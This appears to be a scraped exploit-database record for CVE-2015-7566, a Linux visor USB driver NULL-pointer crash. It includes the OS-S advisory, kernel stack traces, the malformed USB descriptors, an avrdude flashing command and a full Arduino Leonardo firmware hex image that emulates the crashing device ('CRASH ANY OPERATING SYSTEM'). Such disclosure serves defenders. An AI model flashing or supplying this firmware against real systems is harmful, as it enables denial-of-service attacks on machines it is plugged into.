__driver_attach+0x93/0xa0\n[ 34.921136] [<ffffffff813d3420>] ? __device_attach+0x40/0x40\n[ 34.921136] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0\n[ 34.921136] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20\n[ 34.921136] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580\n[ 34.921136] [<ffffffffa0398000>] ? 0xffffffffa0397fff\n[ 34.921136] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor]\n[ 34.921136] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230\n[ 34.921136] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40\n[ 34.921136] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0\n[ 34.921136] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150\n[ 34.921136] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0\n[ 34.921136] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b\n[ 34.921136] Code: 28 48 8b 57 20 0f b6 80 28 02 00 00 88 82 28 02 00 00 48 \n8b 0f c1 e0 0f 0d 00 00 00 c0 8b 09 c1 e1 08 09 c8 48 8b 8a 10 02 00 00 <89> \n41 58 48 8b 92 18 02 00 00 89 42 58 31 c0 5d c3 66 90 b8 ff \n[ 34.921136] RIP [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor]\n[ 34.921136] RSP <ffff88000bd23a80>\n[ 34.921136] CR2: 0000000000000058\n[ 35.341720] ---[ end trace b239663354a1c556 ]---\n[ 35.347341] Kernel panic - not syncing: Fatal exception\n[ 35.348314] drm_kms_helper: panic occurred, switching back to text console\n\nArduino Leonardo Firmware:\n\n:100000000C94A8000C94C5000C94C5000C94C50079\n:100010000C94C5000C94C5000C94C5000C94C5004C\n:100020000C94C5000C94C5000C94C4050C942F04CA\n:100030000C94C5000C94C5000C94C5000C94C5002C\n:100040000C94C5000C94C5000C94C5000C94C5001C\n:100050000C94C5000C94C5000C94C5000C940E02C1\n:100060000C94C5000C94C5000C94C5000C94C500FC\n:100070000C94C5000C94C5000C94C5000C94C500EC\n:100080000C94C5000C94C5000C94C5000C94C500DC\n:100090000C94C5000C94C5000C94C5000C94C500CC\n:1000A0000C94C5000C94C5000C94C5000B030E0302\n:1000B000010305032F032F032F03120316031A0353\n:1000C000200324032F032A030000000200080E006F\n:1000D00000030401000B000000000000000000000D\n:1000E00000000000000004080201104080401020C1\n:1000F00040804080080204018040201002011080EE\n:100100001020404004040404040304050202020217\n:1001100004030202020206060606060604040202A0\n:100120000204000000002300260029002C002F00FC\n:1001300000000000250028002B002E0031000000E8\n:100140000000240027002A002D00300000C180811B\n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077\n:10016000B1E0E4EDF3E102C005900D92A436B107D1\n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C\n:10018000E1F70E94C8000C9404070C940000089545\n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421\n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B\n:1001B00083E00E94300361E087E00E94300361E049\n:1001C00088E00E9430030E9459067E012AE9E20E6F\n:1001D000F11C84E093E0D70111969C938E9389E003\n:1001E00094E013969C938E93129782E2E2E1F1E001\n:1001F0009E012F5F3F4F6901D90101900D928A95B1\n:10020000E1F788E1E4E3F1E0DE01939601900D92DD\n:100210008A95E1F782E1ECE4F1E0DE01DB96019002\n:100220000D928A95E1F789E0EEE5F1E0DE01A05953\n:10023000BF4F01900D928A95E1F72A593F4F99E0FF\n:10024000992ED901E92D1D92EA95E9F78E010957FA\n:100250001F4F87E0E7E6F1E0D80101900D928A9503\n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189\n:1002700001900D928A95E1F7AE0147585F4F87E0F4\n:10028000E5E7F1E0DA0101900D928A95E1F75E0170\n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D\n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172\n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188\n:1002C0009C92F4E01196FC9311971496EC93F9012B\n:1002D000DC01292D01900D922A95E1F7FE01EC56E3\n:1002E000FF4FDC011B96FC93EE931A971D96BC9270\n:1002F000AE921C971183008373836283558344837A\n:100300000C5211092CE0F80111922A95E9F721E02D\n:10031000D80119962C931997FE01E059FF4F0190CF\n:100320000D929A94E1F7F8019387828761E088E063\n:100330000E9469038BE492E00E94650688E892E0DF\n:100340000E94650687EC92E00E94650686E093E0D5\n:100350000E94650682E493E00E9465068FE793E0C1\n:100360000E94650684EA93E00E9465068BEE93E0A6\n:100370000E94650683E00E949F03892B09F047C015\n:100380005E01F3E2AF0EB11C8824839482E1982EC3\n:1003900084E194E00E946506BF92AF92DF92CF9213\n:1003A000FF92EF921F928F921F930F932DB73EB73C\n:1003B000225131090FB6F8943EBF0FBE2DBFADB725\n:1003C000BEB71196FE01FB96892D01900D928A957C\n:1003D000E1F78DE695E00E94030668E873E180E0AE\n:1003E00090E00E947B028DE695E00E944E0660E060\n:1003F00087E00E94690368E873E180E090E00E9472\n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E\n:1004100070E080E090E00E947B02ACCF1F920F92D0\n:100420000FB60F9211242F933F938F939F93AF9307\n:10043000BF938091650590916605A0916705B09185\n:1004400068053091640523E0230F2D3720F40196D1\n:10045000A11DB11D05C026E8230F0296A11DB11DE7\n:10046000209364058093650590936605A0936705C6\n:10047000B09368058091690590916A05A0916B051C\n:10048000B0916C050196A11DB11D809369059093F3\n:100490006A05A0936B05B0936C05BF91AF919F91D6\n:1004A0008F913F912F910F900FBE0F901F90189535\n:1004B0003FB7F8948091690590916A05A0916B050A\n:1004C000B0916C0526B5A89B05C02F3F19F0019689\n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C\n:1004E000711D811D911D42E0660F771F881F991FA6\n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372\n:10050000DF936B017C010E945802EB01C114D104FE\n:10051000E104F10479F00E9458026C1B7D0B683EE7\n:100520007340A0F381E0C81AD108E108F108C8516E\n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029\n:100540000895789484B5826084BD84B5816084BD4B\n:1005500085B5826085BD85B5816085BDEEE6F0E03C\n:10056000808181608083E1E8F0E010828081826098\n:100570008083808181608083E0E8F0E08081816019\n:100580008083E1E9F0E08081826080838081816006\n:100590008083E0E9F0E0808181608083E1ECF0E03D\n:1005A000808184608083808182608083808181609B\n:1005B0008083E3ECF0E0808181608083E0ECF0E018\n:1005C000808182608083E2ECF0E0808181608083C2\n:1005D000EAE7F0E0808184608083808182608083AC\n:1005E000808181608083808180688083089590E02D\n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B\n:10060000AB09809180008F7703C0809180008F7D3F\n:1006100080938000089584B58F7702C084B58F7D64\n:1006200084BD0895809190008F7707C080919000DD\n:100630008F7D03C080919000877F80939000089504\n:100640008091C0008F7703C08091C0008F7D809320\n:10065000C00008958091C200877F8093C2000895F2\n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E\n:10067000EC5FFE4F8491882349F190E0880F991F29\n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0\n:10069000C591D4919FB7611108C0F8948C912095B1\n:1006A00082238C93888182230AC0623051F4F894AB\n:1006B0008C91322F309583238C938881822B888371\n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3\n:1006D00008950F931F93CF93DF931F92CDB7DEB78B\n:1006E000282F30E0F901E853FF4F8491F901EA51D6\n:1006F000FF4F1491F901EC5FFE4F04910023C9F004\n:10070000882321F069830E94F7026981E02FF0E0DD\n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7\n:100720008C91611103C01095812301C0812B8C93A2\n:100730009FBF0F90DF91CF911F910F910895CF939D\n:10074000DF93282F30E0F901E853FF4F8491F9013E\n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5\n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5\n:10077000EE5DFE4FA591B4912C912D2381E090E088\n:1007800021F480E002C080E090E0DF91CF910895F5\n:10079000615030F02091F100FC0120830196F8CFE8\n:1007A000289884E680937D0508951092E9001092C0\n:1007B00071051092700590936F0580936E050895F2\n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3\n:1007D000BA01C8010E94A606F80120E030E08EEFC1\n:1007E0002C173D0791F1F7FE02C0A49101C0A08132\n:1007F000609170057091710540916E0550916F0583\n:1008000064177507ACF49091E8009570E1F390914E\n:10081000E80092FD1CC0A093F100A0917005B0917A\n:1008200071051196AF73BB27AB2B11F48093E800D1\n:10083000A0917005B09171051196B0937105A093C8\n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC\n:100850009FEFDF91CF911F910F91FF9008951F920D\n:100860000F920FB60F9211246F927F928F929F92E8\n:10087000AF92BF92CF92DF92EF92FF920F931F93AE\n:100880002F933F934F935F936F937F938F939F9398\n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3\n:1008A0006297DEBFCDBF1092E9008091E80083FF20\n:1008B00046C168E0CE010A960E94C80382EF809389\n:1008C000E8009A8597FF05C08091E80080FFFCCF83\n:1008D00003C08EEF8093E800892F807609F023C152\n:1008E0008B85811105C01092F1001092F10020C19A\n:1008F000282F2D7F213009F41BC1853049F48091C8\n:10090000E80080FFFCCF8C8580688093E30010C1F5\n:10091000863009F0E1C02D8508891989223009F057\n:10092000B3C0EC848E2D90E0209173053091740556\n:10093000821793070CF09FC00E94D5031F92EF927D\n:100940008DE394E09F938F930E9483068CE0E89E52\n:1009500070011124E0917505F0917605EE0DFF1DF3\n:1009600089E0DE01119601900D928A95E1F7C801A8\n:100970000E94D50349E050E0BE016F5F7F4F80E0E9\n:100980000E94E0030F900F900F900F90C12CD12C7C\n:10099000612C712C33E7A32E34E0B32E4AEA842E67\n:1009A00044E0942EE0917505F0917605EE0DFF1D63\n:1009B000818590E0681679060CF0BAC07F926F923C\n:1009C000BF92AF920E948306E0917505F091760583\n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5\n:1009E00080E00E94E0030F900F900F900F9000E0C6\n:1009F00010E0E0917505F0917605EE0DFF1D028483\n:100A0000F385E02DEC0DFD1D818590E00817190799\n:100A10005CF51F930F939F928F920E948306E09143\n:100A20007505F0917605EE0DFF1D0284F385E02D2E\n:100A3000EC0DFD1DC801880F991FA485B585A80F71\n:100A4000B91F4D915C910284F385E02DE80FF91FE9\n:100A50006081718180E00E94E0030F5F1F4F0F9063\n:100A60000F900F900F90C5CF8FEF681A780A8EE025\n:100A7000C80ED11C97CF8FED94E09F938F930E9467\n:100A800083060F900F9058C0C8012A8B0E94D5038F\n:100A90002A892130C1F0233009F04EC08C851F9285\n:100AA0008F9389EF94E09F938F930E94830642E097\n:100AB00050E062E871E080E00E94E0030F900F9048\n:100AC0000F900F9035C04091000150E060E071E060\n:100AD00080E00E94E0032CC0873071F1883021F45F\n:100AE00081E08093F10024C0893011F5937021F5E5\n:100AF000EDE4F1E081E021E096E38093E9002093CA\n:100B0000EB0034913093EC009093ED008F5F3196C1\n:100B1000843099F78EE78093EA001092EA008C8582\n:100B20008093720505C0888999890E94D50304C005\n:100B30008EEF8093E80003C081E28093EB00629621\n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE\n:100B5000EF91BF91AF919F918F917F916F915F9135\n:100B60004F913F912F911F910F91FF90EF90DF9048\n:100B7000CF90BF90AF909F908F907F906F900F908D\n:100B80000FBE0F901F9018951F920F920FB60F92E5\n:100B900011248F939F938091E1001092E10083FFD5\n:100BA0000FC01092E90091E09093EB001092EC00DE\n:100BB00092E39093ED001092720598E09093F0000C\n:100BC00082FF1AC080917E05882339F080917E05CE\n:100BD000815080937E05882369F080917D0588236C\n:100BE00059F080917D05815080937D05811104C06D\n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE\n:100C00000F901F901895CF93DF93CDB7DEB782E199\n:100C1000FE013596A0E0B1E001900D928A95E1F7D2\n:100C20008F89988D9093760580937505898D9A8D1F\n:100C300090937405809373058B8D9C8D90937C05A8\n:100C400080937B058D8D9E8D90937A058093790599\n:100C50008F8D98A1909378058093770510927205F7\n:100C600081E08093D70080EA8093D80082E189BD3B\n:100C700009B400FEFDCF61E070E080E090E00E94EA\n:100C80007B0280E98093D8008CE08093E200109290\n:100C9000E000559A209ADF91CF91089581E08093EA\n:100CA000E00008959091C80095FFFCCF8093CE009E\n:100CB00008951092CD0087E68093CC0088E1809360\n:100CC000C9008EE08093CA0008950F931F93CF93BD\n:100CD000DF93EC018C01FE0101900020E9F73197D0\n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E\n:100CF000F80181918F010E945206EDCFDF91CF91D3\n:100D00001F910F910895CF93DF93CDB7DEB7DA959A\n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6\n:100D2000419151919F0160E071E0CE0101960E94D6\n:100D30000707CE0101960E946506D3950FB6F89479\n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE\n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9\n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E\n:100D70003F932F9389839A830E9483068981882ECB\n:100D80009A81992E0F900F9000E010E08EE5E82EEA\n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5\n:100DA000E4F4F40181914F0190E09F938F93FF92BF\n:100DB000EF920E9483060F5F1F4FC8018F70992723\n:100DC0000F900F900F900F90892B41F7DF92CF92E9\n:100DD0000E9483060F900F90E1CF81E194E09F93F2\n:100DE0008F930E9483060F900F900F900F90DF91CA\n:100DF000CF911F910F91FF90EF90DF90CF90BF9018\n:100E0000AF909F908F900895F8940C94E809AEE00D\n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8\n:100E20004C831A83098377FF02C060E070E8615049\n:100E300071097E836D83A901BC01CE0101960E94D8\n:100E400033074D815E8157FD0AC02F8138854217D7\n:100E500053070CF49A01F801E20FF31F10822E964B\n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB\n:100E7000B1097C016B018A01FC0117821682838112\n:100E800081FFBDC1CE0101964C01F7019381F601AE\n:100E900093FD859193FF81916F01882309F4ABC184\n:100EA000853239F493FD859193FF81916F018532ED\n:100EB00029F4B70190E00E941B09E7CF512C312C97\n:100EC00020E02032A0F48B3269F030F4803259F007\n:100ED000833269F420612CC08D3239F0803339F4CB\n:100EE000216026C02260246023C0286021C027FD25\n:100EF00027C030ED380F3A3078F426FF06C0FAE00C\n:100F00005F9E300D1124532E13C08AE0389E300DA1\n:100F10001124332E20620CC08E3221F426FD6BC1C9\n:100F2000206406C08C3611F4206802C0883641F473\n:100F3000F60193FD859193FF81916F018111C1CFDE\n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B\n:100F5000F9830DC0833631F0833771F0833509F0A2\n:100F60005BC022C0F801808189830E5F1F4F44243B\n:100F70004394512C540115C03801F2E06F0E711CDE\n:100F8000F801A080B18026FF03C0652D70E002C08B\n:100F90006FEF7FEFC5012C870E9410092C018301A0\n:100FA0002C852F77222E17C03801F2E06F0E711CAE\n:100FB000F801A080B18026FF03C0652D70E002C05B\n:100FC0006FEF7FEFC5012C870E9405092C012C854E\n:100FD0002068222E830123FC1BC0832D90E048163D\n:100FE0005906B0F4B70180E290E00E941B093A94E0\n:100FF000F4CFF50127FC859127FE81915F01B701B0\n:1010000090E00E941B0931103A94F1E04F1A510808\n:101010004114510471F7E5C0843611F0893639F571\n:10102000F80127FF07C060817181828193810C5F85\n:101030001F4F08C060817181882777FD8095982FA8\n:101040000E5F1F4F2F76B22E97FF09C090958095A7\n:10105000709561957F4F8F4F9F4F2068B22E2AE089\n:1010600030E0A4010E944D09A82EA81844C085377D\n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E\n:10108000BF2E8F36C1F018F4883579F0B4C08037A0\n:1010900019F0883721F0AFC02F2F2061B22EB4FE97\n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D\n:1010B0009660B92E06C028E030E005C020E130E09F\n:1010C00002C020E132E0F801B7FE07C06081718103\n:1010D000828193810C5F1F4F06C06081718180E027\n:1010E00090E00E5F1F4FA4010E944D09A82EA81882\n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428\n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0\n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016\n:10112000FE01EA0DF11D8081803311F4297E09C092\n:1011300022FF06C07394739404C0822F867809F04E\n:10114000739423FD13C020FF06C05A2C731418F4A7\n:10115000530C5718732C731468F4B70180E290E0B5\n:101160002C870E941B0973942C85F5CF731410F4FF\n:10117000371801C0312C24FF12C0B70180E390E082\n:101180002C870E941B092C8522FF17C021FF03C05A\n:1011900088E590E002C088E790E0B7010CC0822F9C\n:1011A000867859F021FD02C080E201C08BE227FD64\n:1011B0008DE2B70190E00E941B09A51438F4B70135\n:1011C00080E390E00E941B095A94F7CFAA94F4019F\n:1011D000EA0DF11D8081B70190E00E941B09A1106A\n:1011E000F5CF332009F451CEB70180E290E00E94A0\n:1011F0001B093A94F6CFF7018681978102C08FEFE1\n:101200009FEF2C96E2E10C94CD09FC010590615012\n:1012100070400110D8F7809590958E0F9F1F08950C\n:10122000FC016150704001900110D8F780959095B5\n:101230008E0F9F1F08950F931F93CF93DF93182F47\n:10124000092FEB018B8181FD03C08FEF9FEF20C041\n:1012500082FF10C04E815F812C813D814217530770\n:101260007CF4E881F9819F012F5F3F4F3983288308\n:10127000108306C0E885F985812F0995892B29F708\n:101280002E813F812F5F3F4F3F832E83812F902FF1\n:10129000DF91CF911F910F910895FA01AA2728306D\n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33\n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF\n:1012C000781F891F9A1FA11D680F791F8A1F911D02\n:1012D000A11D6A0F711D811D911DA11D20D009F452\n:1012E00068943F912AE0269F11243019305D319394\n:1012F000DEF6CF010895462F4770405D4193B3E07D\n:101300000FD0C9F7F6CF462F4F70405D4A3318F023\n:10131000495D31FD4052419302D0A9F7EACFB4E0D4\n:10132000A6959795879577956795BA95C9F700978C\n:101330006105710508959B01AC010A2E069457952D\n:10134000479537952795BA95C9F7620F731F841F84\n:10135000951FA01D0895EE0FFF1F0590F491E02D3D\n:1013600009942F923F924F925F926F927F928F9249\n:101370009F92AF92BF92CF92DF92EF92FF920F9324\n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E\n:10139000F894DEBF0FBECDBF09942A8839884888EB\n:1013A0005F846E847D848C849B84AA84B984C88481\n:1013B000DF80EE80FD800C811B81AA81B981CE0F78\n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D\n:0413D000F894FFCFBF\n:1013D4001201000200000040AD0BEFBE000101024B\n:1013E4000001220342006100640020004200410029\n:1013F40042004500250078002500780025006E0095\n:1014040025007000180342004100440020004300FE\n:10141400300046004600450045002100120100024C\n:10142400000000404C0544010001010203010902CF\n:10143400270001010000FA0705810104040C0705D7\n:10144400010104000C0705820104000C07000700D9\n:101454000700480100500072006F006C00690066CC\n:101464000069006300000A550000006BFD180A00C3\n:10147400809F0AB901312B940A8101128946001315\n:10148400000257028B0A5E0AF80A5F01F212010099\n:1014940002010000400D055702000101020301B9D9\n:1014A4000A0100F80A5F0A810A220342006100640B\n:1014B400002000420041004200450025007800253C\n:1014C40000780025006E00250070001803420041DA\n:1014D400004400200043003000460046004500451B\n:1014E40000210012010002010000400D0557020016\n:1014F400010102030109040000030100000003F2DA\n:101504000AEC0A0902270001010000FA01AB0A09EA\n:101514000400000301000000090200202020202014\n:101524005F5F5F5F5F5F5F5F2020202020202020BF\n:1015340020202020202020202020202020202020A7\n:1015440020205F5F5F5F5F205F5F20205F2020209F\n:101554002020205F5F0A0D00202020202F205F5FC5\n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3\n:101574005F5F20205F5F5F5F5F20202020202F209F\n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3\n:10159400202F5F5F0A0D002020202F202F202020E5\n:1015A4002F205F5F205C2F205F5F20602F205F5F14\n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A\n:1015C400205C2F205F5F2F202F205F5F5F2F202F55\n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009\n:1015E4002F202F202F202F5F2F202F202F5F2F2001\n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0\n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD\n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07\n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F\n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4\n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044\n:101654003C3C2043485241534820414E59204F506E\n:1016640045524154494E472053595354454D203E09\n:101674003E0A0D00203C3C202863292053657267F4\n:10168400656A20536368756D696C6F20323031353B\n:101694002C204F70656E536F7572636520536563BC\n:1016A40075726974792052616C66205370656E6E30\n:1016B4006562657267203E3E0A0D000A3E3E205078\n:1016C4007265737320627574746F6E20746F207307\n:1016D4007461727420657865637574696F6E2E2EFB\n:1016E4002E0A0D005B44454255475D2045786563ED\n:1016F400757465207061796C6F616420300A0D0027\n:10170400526563762D446174613A0A0D005B444569\n:101714004255475D200953656E6420436F6E6669C8\n:101724006775726174696F6E44657363726970740E\n:101734006F720928696E6465783A2569292E2E2E00\n:101744000D0A005B44454255475D200953656E64AC\n:1017540020496E74657266616365204465736372C3\n:101764006970746F720928696E7465726661636565\n:101774003A2569292E2E2E0D0A005B444542554711\n:101784005D200953656E6420456E64706F696E74E4\n:101794002044657363726970746F720928656E649E\n:1017A400706F696E743A2569292E2E2E0D0A005B1E\n:1017B40044454255475D203C3C70616E6963206D31\n:1017C4006F64653F3E3E0D0A005B44454255475DEC\n:1017D4002009203E3E20537472696E67204465736D\n:1017E40063726970746F72207265717565737420A9\n:1017F4002D2073656E64696E67206D616C666F720F\n:101804006D656420737472696E67212073657475E5\n:10181400702E7756616C75654C203D3D2025690D11\n:101824000A005B48455844554D505D0A0D0025306B\n:041834003258200006\n:00000001FF", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2023-09-26T00:36:29", "description": "", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-09T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["2015-7566", "CVE-2015-7566"], "modified": "2016-03-09T00:00:00", "id": "EDB-ID:39540", "href": "https://www.exploit-db.com/exploits/39540", "sourceData": "OS-S Security Advisory 2016-09\r\nLinux visor clie_5_attach Nullpointer Dereference\r\n\r\nDate: March 4th, 2016\r\nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg\r\nCVE: CVE-2015-7566\r\nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)\r\nTitle: Local RedHat Enterprise Linux DoS \u00e2?? RHEL 7.1 Kernel crashes on invalid \r\nUSB device descriptors (visor clie_5_attach driver)\r\nSeverity: Critical. The Kernel panics. A reboot is required.\r\nEase of Exploitation: Trivial\r\nVulnerability type: Wrong input validation\r\nProducts: RHEL 7.1 including all updates\r\nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \r\nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)\r\nVendor: Red Hat\r\nVendor contacted: November, 12th 2015\r\nPDF of advisory: https://os-s.net/advisories/OSS-2016-09_visor_clie_5_attach.pdf\r\n\r\nAbstract:\r\nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \r\ndevice requiring the visor (clie_5_attach) driver.\r\n\r\nDetailed product description:\r\nWe confirmed the bug on the following system:\r\nRHEL 7.1\r\nKernel 3.10.0-229.20.1.el7.x86_64\r\nFurther products or kernel versions have not been tested.\r\nHow reproducible: Always\r\nActual results: Kernel crashes.\r\n\r\nDescription:\r\nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \r\n(github.com/schumilo) using the following device descriptor:\r\n\r\n[*] Device-Descriptor\r\nbLength:\t0x12\r\nbDescriptorType:\t0x1\r\nbcdUSB:\t0x200\r\nbDeviceClass:\t0x3\r\nbDeviceSubClass:\t0x0\r\nbDeviceProtocol:\t0x0\r\nbMaxPacketSize:\t0x40\r\nidVendor:\t0x54c\r\nidProduct:\t0x144\r\nbcdDevice:\t0x100\r\niManufacturer:\t0x1\r\niProduct:\t0x2\r\niSerialNumbers:\t0x3\r\nbNumConfigurations:\t0x1\r\n\r\nThe clie_5_attach function of the visor driver, which is called during the \r\ndriver initialization process, expects an OUT-Bulk-Endpoint. \r\nDue to an incomplete sanity check, the visor driver tries to dereference null-\r\npointers. \r\nThis results in a crash of the system.\r\n\r\n****\r\n$ nm visor.ko.debug | grep clie_5_attach\r\n0000000000000030 t clie_5_attach\r\n$ addr2line -e visor.ko.debug 6d\r\n/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_\r\n64/drivers/usb/serial/visor.c:610\r\n****\r\n\r\n**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/visor.c)\r\n...\r\n607\r\n608 pipe = usb_sndbulkpipe(serial->dev, port->bulk_out_endpointAddress);\r\n609 for (j = 0; j < ARRAY_SIZE(port->write_urbs); ++j)\r\n610 port->write_urbs[j]->pipe = pipe; /* if there is no configured OUT-\r\nbulk-endpoint, the kernel tries to dereference null-pointers */\r\n611\r\n612 return 0;\r\n613 }\r\n...\r\n****\r\n\r\n[*] Configuration-Descriptor\r\nbLength:\t0x9\r\nbDescriptorType:\t0x2\r\nwTotalLength:\t0x27\r\nbNumInterfaces:\t0x1\r\nbConfigurationValue:\t0x1\r\niConfiguration:\t0x0\r\nbmAttributes:\t0x0\r\nbMaxPower:\t0x31\r\n[*] Interface-Descriptor\r\nbLength:\t0x9\r\nbDescriptorType:\t0x4\r\nbInterfaceNumber:\t0x0\r\nbAlternateSetting:\t0x0\r\nbNumEndpoints:\t0x3\r\nbInterfaceClass:\t0x0\r\nbInterfaceSubClass:\t0x0\r\nbInterfaceProtocol:\t0x0\r\n[*] Endpoint-Descriptor:\r\nbLength:\t0x7\r\nbDescriptorType:\t0x5\r\nbEndpointAddress:\t0x81\t\u00ef?? IN-Direction\r\nbmAttribut:\t0x1\t\u00ef?? ISO-Transfer\r\nwMaxPacketSize:\t0x404\r\nbInterval:\t0xc\r\n[*] Endpoint-Descriptor:\r\nbLength:\t0x7\r\nbDescriptorType:\t0x5\r\nbEndpointAddress:\t0x1\t\u00ef??OUT-Direction\r\nbmAttribut:\t0x1\t\u00ef??ISO-Transfer (change this \r\nvalue to 0x2, which is the value for bulk-transfer without additional \r\nfeatures, and the visor driver won't crash)\r\nwMaxPacketSize:\t0x4\r\nbInterval:\t0xc\r\n[*] Endpoint-Descriptor:\r\nbLength:\t0x7\r\nbDescriptorType:\t0x5\r\nbEndpointAddress:\t0x82\t\u00ef??IN-Direction\r\nbmAttribut:\t0x1\t\u00ef??ISO-Transfer\r\nwMaxPacketSize:\t0x4\r\nbInterval:\t0xc\r\n\r\nProof of Concept:\r\nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \r\nfirmware will emulate the defective USB device.\r\n\r\navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \r\nflash:w:binary.hex\r\n\r\nThe firmware has been attached to this bug report.\r\nTo prevent the automated delivery of the payload, a jumper may be used to \r\nconnect port D3 and 3V3!\r\n\r\nSeverity and Ease of Exploitation:\r\nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \r\nonly physical access to the system is required.\r\n\r\nVendor Communication:\r\nWe contacted Red Hat on the November, 12th 2015.\r\nThis bug was fixed upstream. A CVE number was not assigned.\r\n\r\nReferences:\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283371\r\nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i\r\nd=cb3232138e37129e88240a98a1d2aba2187ff57c\r\n\r\nKernel Stacktrace:\r\n\r\n[ 34.568077] usb 1-1: new full-speed USB device number 2 using xhci_hcd\r\n[ 34.791731] usb 1-1: New USB device found, idVendor=054c, idProduct=0144\r\n[ 34.795463] usb 1-1: New USB device strings: Mfr=1, Product=2, \r\nSerialNumber=3\r\n[ 34.799619] usb 1-1: Product: \u00c4?\r\n[ 34.804592] usb 1-1: Manufacturer: \u00c4?\r\n[ 34.810144] usb 1-1: SerialNumber: %\r\n[ 34.872285] usbcore: registered new interface driver 